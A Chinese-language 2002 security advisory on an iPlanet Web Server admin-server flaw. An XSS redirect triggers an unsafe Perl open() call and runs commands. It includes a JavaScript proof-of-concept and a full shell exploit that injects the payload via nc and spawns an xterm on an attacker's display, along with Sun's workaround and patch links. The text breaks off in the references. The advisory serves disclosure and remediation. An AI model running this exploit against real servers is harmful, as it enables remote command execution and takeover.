iPlanet 管理服务器不安全的open调用漏洞发布时间:2002-11-19 更新时间:2003-01-08 严重程度:高 威胁程度:远程管理员权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:6203 受影响系统 iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP9详细描述 iPlanet WEB服务器存在一个命令执行漏洞因为非安全的调用open()函数。这个漏洞存在于管理服务器的perl CGI脚本中。这个漏洞的利用可以在服务器上以WEB进程的权限执行命令。 iPlanet WEB服务器在管理员通过管理服务器浏览错误日志的时候存在XSS漏洞。一旦管理员成功登录到管理服务器就可以触发XSS漏洞。 利用该漏洞的关键是不要直接利用open()的PERL漏洞,但用XSS漏洞可以重导向管理员浏览器到可以造成open()命令劫持的URL。 测试代码 <script> window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00"; </script> Exploit: #!/bin/sh # # iPlanet Remote root exploit # Tested versions: 4.* up to SP11 # # By: Ferm韓 J. Serna CTO, NGSEC # http://www.ngsec.com <fjserna@ngsec.com> # # Madrid, 09/10/2002 echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC" echo "http://www.ngsec.com <fjserna@ngsec.com>" echo if [ $# != "3" ] then echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>" exit fi echo "1.- Setting xhost +$1" xhost +$1 echo echo "2.- Building XSS string:" CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>" echo $CADENA echo echo "3.- Sending HTTP request:" SEND="GET /$CADENA HTTP/1.0" echo "$SEND" (echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2 echo echo echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool." echo 解决方案 SUN提供下面的解决办法: 编辑文件index.lst和nescore.spm,它们存在于下面目录中: <SERVER ROOT>/https/admin/html <SERVER ROOT>/https/httpadmin/html 在下面这些行的前面添加一个分号“;”: --Option:viewacc,View Access Log --Option:viewerr,View Error Log 这用来将这些行注释掉,取消管理服务器现实日志文件的功能。重新启动服务器,确信新的配置使用起来。 或者下载补丁: iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP6: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP5: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP4: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP3: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP2: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0 SP1: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP9: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP8: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP7: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP6: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP5: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP4: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP3: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP2: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP10: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP1: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html iPlanet E-Commerce Solutions iPlanet Web Server 4.1: Sun Upgrade ONE Web Server 4.1 SP11 http://wwws.sun.com/software/download/download/5292.html Sun ONE Web Server 6.0 SP1: Sun Upgrade ONE Web Server 6.0 SP2 http://wwws.sun.com/software/download/download/5126.html Sun ONE Web Server 6.0: Sun Upgrade ONE Web Server 6.0 SP2 http://wwws.sun.com/software/download/download/5126.html 相关信息 相关连接: iPlanet WebServer, remote root compromise http://online.securityfocus.com/archive/1/300451 Free Sun Alert Notifications Article 49475 (Sun Microsystems) http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F49475 Sun[tm] ONE W |
